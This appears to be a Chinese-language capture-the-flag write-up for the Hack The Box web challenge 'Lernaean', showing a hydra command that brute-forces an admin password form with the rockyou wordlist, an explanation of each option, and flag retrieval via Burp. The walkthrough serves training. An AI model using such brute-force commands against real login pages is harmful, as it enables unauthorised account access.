【hackthebox】【Challenges】【Lernaean】

一个来自HTB的web挑战

提示语:你的目标对计算机不是很好。尝试并猜测他们的密码，看看他们是否隐藏任何东西！

打开页面，出现“Please do not try to guess my password!”

那么我们用hydra来爆破下

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 53113

 

-l：指定用户名

-P(大写)：指定密码字典文件

-t：线程数

docker.hackthebox.eu:网页地址，也可以是IP地址

http-post-form：表明是post请求

“/：password=^PASS^：Invalid password!”    分别是目标网页位置：需要破解的字段：猜测错误的出现的字段（可以自定义）

-s：端口号

 

然后用burp重发下，flag就在响应包里面